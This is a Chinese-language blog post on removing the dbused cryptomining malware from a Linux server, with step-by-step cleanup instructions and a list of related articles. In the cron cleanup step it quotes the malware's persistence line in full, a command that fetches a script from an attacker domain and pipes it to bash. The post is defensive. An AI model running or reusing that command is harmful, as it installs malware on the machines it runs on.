dbused把我的CPU占满了!服务器挖矿病毒的解决办法

最新推荐文章于 2024-10-27 12:32:20 发布
最新推荐文章于 2024-10-27 12:32:20 发布
阅读量1.4k 收藏 2
点赞数 6
文章标签: 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52487413/article/details/119680776
版权

dbused进程 系统优化 病毒清除 恶意计划任务 持久防护
关键词由CSDN通过智能技术生成

现象描述

1、通过xshell连接出现非常严重的卡顿,进入后发现CPU被名为dbused的进程占满了

 当初按照百度和csdn的文档进行处理病毒的时候,都是指标不治本,清理了一段时间第二天打开电脑,它又起来了,就是反反复复很是难受,我总结了一下别人的经验加自己如何处理的。

解决方案:

1.首先查看dbused进程是哪个用户启动的。

2. vim /home/tidb/.bash_profile  这个文件最后一行如果又下面这个命令 一定要删除  注意:哪个用户启动的dbsed就去哪个用户的家目录去查看,这里以tidb为例。

 3.cd /var/spool/cron   查看周期性计划任务   并删除下面任务 
 * * * * * (curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /tmp/xms; bash /tmp/xms; /tmp/xms; rm -rf /tmp/xms

 4.杀掉进程

   kill bashirc
   kill dbused 

5. 进入到/tmp 目录下删除病毒文件
bashirc dbused sshcheck 都为病毒文件  

6.间隔一小时查看病毒是否还会启动

939543111
关注
ch数据库的创建和使用江苏省二级实用PPT课件.pptx
10-06
- DBUSED()函数用来检查数据库是否已打开并被使用。 - DBGETPROP()函数获取数据库或表的属性。 - DBSETPROP()函数用来设置数据库或表的属性。 综上所述,本PPT课件主要讲解了VFP中数据库的概念、创建、使用,以及...
阿里云服务器 dbus 、pftp 服务突然占用99%的cpu
yushaolong1234的博客
08-16 2872
top  kill <pid> shundown -r now
dbused把我的CPU占满了!linux服务器挖矿病毒的解决历程
Ryan2k的博客
02-26 9018
dbused把我的CPU占满了!linux服务器挖矿病毒的解决历程 现象描述 今天通过密钥以普通用户tung的身份登录远程Cent OS服务器时,连接出现非常严重的卡顿,进入后发现CPU被名为dbused进程占满了! reboot重启服务器之后,以root身份登录服务器,发现cpu是正常的。使用top命令查看,dbused并没有运行,但是时不时出现tung用户的bash进程和wget命令会运行。并没有登录tung用户,该用户的命令却时不时运行,这让我感到很奇怪。 此时登录tung用户后,dbused便立
记一次解决dbused挖矿病毒
qielanyu_的博客
10-10 1160
参考文章: 解决挖矿病毒导致的cpu100%_Newbie_J的博客-CSDN博客 dbused把我的CPU占满了!linux服务器挖矿病毒的解决历程_gitTung的博客-CSDN博客_dbused 一次挖矿病毒的处理过程复盘-简易百科 引言:直接影响,导致confluence无法使用。top时发现跟confluence账号相关,于是从这个方面着手,开始解决问题 1.进入 /var/spool/cron/ ,发现存在confluence5的一个定时任务,其内容如下: * * * *
dbused挖矿病毒清理过程
老司机开新车的博客
04-12 5174
表现 过了个周末,一觉醒来,服务器上部署的程序无法访问了,想ssh进入shell查看,shell也连接不上,去云服务器提供商后台查看监控曲线,发现cpu使用率一直在100%,在后台页面重启实例,进入shell进行恢复。 处理 使用top 命令查看CPU使用率,发现dbused进程高居榜首,就是它,干它! 驻留项 添加4个驻留项如下: (1)bash启动项 ~/.bash_profile 在打开终端时将会执行该挖矿木马,注意需要到对应用户目录下清理bash_profile cp -f -r -- /bin/b
“漏洞利用之王”HolesWarm挖矿木马新增大量攻击模块强势来袭
dzqxwzoe的博客
07-21 103
近期,威胁情报团队在活跃家族监控中捕获到了HolesWarm挖矿家族的最新变种。在本次更新中,该病毒家族。
Linux挖矿病毒事件应急响应演练(dbused木马)
Li-D的博客
11-17 7471
环境准备 **攻击机**:kali(192.168.130.131) **靶机**:Ubuntu(192.168.130.138) 攻击阶段 (1)通过端口扫描工具,对服务器进行端口探测尝试,发现开启了22端口; (2)通过hydra工具暴力尝试破解用户名和密码,发现暴破成功,用户名为:root/root (3)在攻击机上准备挖矿病毒 (4)接下来进行攻击入侵,等待脚本运行 应急响应 检测阶段 (1)查看服务器系统整体运行情况,发现名为dbused的可疑进程大量占用系统CPU使用率 (2)查看是否存
ch数据库的创建和使用江苏省二级实用PPT学习教案.pptx
10-06
- **DBUSED()**:检查数据库中是否已使用特定的表。 - **DBGETPROP()**:获取数据库或表的属性值。 - **DBSETPROP()**:设置数据库或表的属性值。 9. **关系类型**:数据库中的表关系主要有一对一、一对多和多对...
linux卡顿登录缓慢解决途径
wujiahua的博客
12-01 3416
linux基本信息: OS:Asianux 7.3 虚拟机 业务反馈节点无法登录影响测试,第一时间ssh登录,第一现象:ssh登录缓慢,持续1分钟。top命令显示dbus-daemon进程占用CPU100%。strace -f -F -p追踪该进程显示too many open files。ulimit -a检查下各用户设置的打开文件数的参数限制,参数设置没问题。 使用命令lsof | awk '{print $2 $1}' | sort |uniq -c | sort -rn >> 1
记一次排查挖矿进程dbus,autoupdate)
weixin_43568232的博客
07-28 1957
线上服务期cpu高达60%,服务器配置32个逻辑cpu,日常cpu最多也就10%左右 开始没有怀疑是挖矿进程,毕竟cpu没有飙到100 本人虽说不是专业运维,前后也遇到过四五种漏洞导致的挖矿进程(jenkins,xxlJob,redis等) 既然漏洞的大门是我打开的,那就要由我来关上 中了挖矿病毒,只杀挖矿进程是一定杀不干净的,必须找到该挖矿病毒是从哪个漏洞进来的, 漏洞修复后,再把相关进程及文件清掉,挖矿病毒才会被消灭干净, 当cpu彪高影响线上,可以先把挖矿进程kill,把cpu降下来,再排查问题出在哪
dbus-daemon进程cpu 100%
HappyLearnerL的博客
01-29 786
【代码】dbus-daemon进程cpu 100%
dbused 挖矿病毒清理
记昨日书的博客
09-26 776
问题描述 系统:centos 7 现象:服务器CPU一直100%,top 命令发现 dbused 占用,kill 掉后自启CPU依然100% 1. 临时降低CPU使用率 while true; do ps -aux | egrep "dbused|sendmail|wget|python" | awk '{print $2}' | xargs kill; done 2. 关闭定时任务自启 systemctl disable crond 3. 清理环境变量(.bash_profile) chattr -i
Linux - 残留的dbus-daemon或dbus-launch,如何避免或如何清理?
IT基础架构
05-17 6825
Linux - 残留的dbus-daemon或dbus-launch,如何避免或如何清理? 文章目录Linux - 残留的dbus-daemon或dbus-launch,如何避免或如何清理?前言一、dbus是什么?二、模拟残留dbus进程三、根因四、解决方案1. 对于交互shell,确保在启动shell进程前启动dbus-run-session总结 前言 远程启动应用并关闭应用后,有残留的dbus进程。这个情况在一般情况下没什么大不了,但在集群调度的环境,残留的任何进程将可能导致调度系统误判job未完成。
dbused StartMiner最新变种 cpu爆满 挖矿病毒 redis漏洞手动查杀流程
arr的博客
09-02 1433
上图是特征 如果是生产服务器建议还是直接重新装一台快一点 这个病毒很恶心,到处都有他的定时器,到处都有他的执行指令.好在他自己的名字是固定的,不然真的很难定位 ps -aux
[已解决·实验日志] AutoDL系统盘异常爆满,原因是PyCharm 在连接到远程服务器调试时,自动执行后台任务(正在更新 python解释器), 将某些包&依赖项下载到了服务器
最新发布
科研汪小陈的博客
10-27 474
今天照常debug中途退出,准备服务器GPU关机,突然看到系统盘爆满,顿时血压升高,咱来一探究竟。直接上结论:AutoDL系统盘异常爆满,原因是PyCharm 在连接到远程服务器时,会自动执行后台任务更新 python解释器,自动将某些包&依赖项下载到了服务器上,很占空间,只能手动清除,但无法根除
裸奔真的会中木马病毒 挖矿病毒 wup.exe 程序文件占用电脑资源
flaribbit的博客
02-05 947
4日晚上,打开任务管理器的时候发现CPU使用一直在80%,是 wup.exe 占用的,同时还占用了2G内存,低优先级运行,用户名 SYSTEM,很不正常,于是开始排查。 发现这玩意是上午十点左右中的,仔细回想那时段并无敏感操作,也没有程序要权限,大概是通过某些漏洞传播的罢。 具体行为 程序列表里多了个 CloudNet,且难以卸载 在C盘创建了 wup 文件夹和伪装的 rss 文件夹(都是隐藏的),用来放自己的木马程序 在C盘创建了伪装的 Windows Defender 文件夹,放了个伪装的程序 在临时
使用dbus进行进程通信
拉戈蓝人的博客
05-14 3097
1. 介绍: DBUS是一种高级的进程间通信机制。DBUS支持进程间一对一和多对多的对等通信,在多对多的通讯时,需要后台进程的角色去分转消息,当一个进程发消息给另外一个进程时,先发消息到后台进程,再通过后台进程将信息转发到目的进程DBUS后台进程充当着一个路由器的角色。 DBUS中主要概念为总线,连接到总线的进程可通过总线接收或传递消息,总线收到消息时,根据不同的消息类型进行不同的处...
记一次服务器挖矿程序占用的解决过程
热门推荐
dabao87的博客
07-31 2万+
公司有台做voip的服务器最近CPU总是跑满,这机器自从交给厂家搭好环境后基本就没怎么管它,于是进去查看进程,top了下(见下图) 这个叫wnTKYg的进程很诡异,已经把CPU吃光了,上网一查,原来是中了挖矿的马。(啊,我的天。这只是一个单核1G内存的阿里云主机)既然被***了,那就得干掉它,下面是解决过程: 1:第一步要先找到这个wnTKYg文件实体,对了还有一个叫ddg.2020的进程。 ...
再谈ORACLE CPROCD进程
ezbit
07-04 2113
罗列一下有关oprocd的知识点 oprocd是oracle在rac中引入用来fencing io的 在unix系统下,如果我们没有采用oracle之外的第三方集群软件,才会存在oprocd进程 在linux系统下,只有在10.2.0.4版本后,才会具有oprocd进程 在window下,不会存在oprocd 进程,但是会存在一个oraFenceService服务,用来实现相同的功能,该服
linux 病毒 挖矿病毒kworkers
堂哥码财的博客
08-24 3188
修复病毒参考: https://blog.csdn.net/elvismelody/article/details/119718680
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值